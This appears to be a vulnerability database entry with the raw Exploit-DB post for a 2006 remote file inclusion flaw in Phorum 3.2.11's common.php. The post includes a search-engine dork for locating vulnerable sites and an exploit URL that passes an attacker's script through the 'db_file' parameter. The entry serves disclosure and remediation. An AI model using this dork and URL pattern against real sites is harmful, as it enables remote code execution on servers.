Phorum v3.2.11

vendor:

Phorum

by:

Mr-m07

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Phorum

Affected Version From: 3.2.11

Affected Version To: 3.2.11

Patch Exists: YES

Related CWE: N/A

CPE: a:phorum:phorum:3.2.11

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

A remote file inclusion vulnerability exists in Phorum v3.2.11. This is due to a lack of proper sanitization of user-supplied input to the 'db_file' parameter in the 'common.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Phorum.

Source

Exploit-DB raw data:

===========================================================
Yee7TeaM

WwW.Yee7.CoM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Download: http://skrypty.webpc.pl/pobierz274.html

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================

# milw0rm.com [2006-12-06]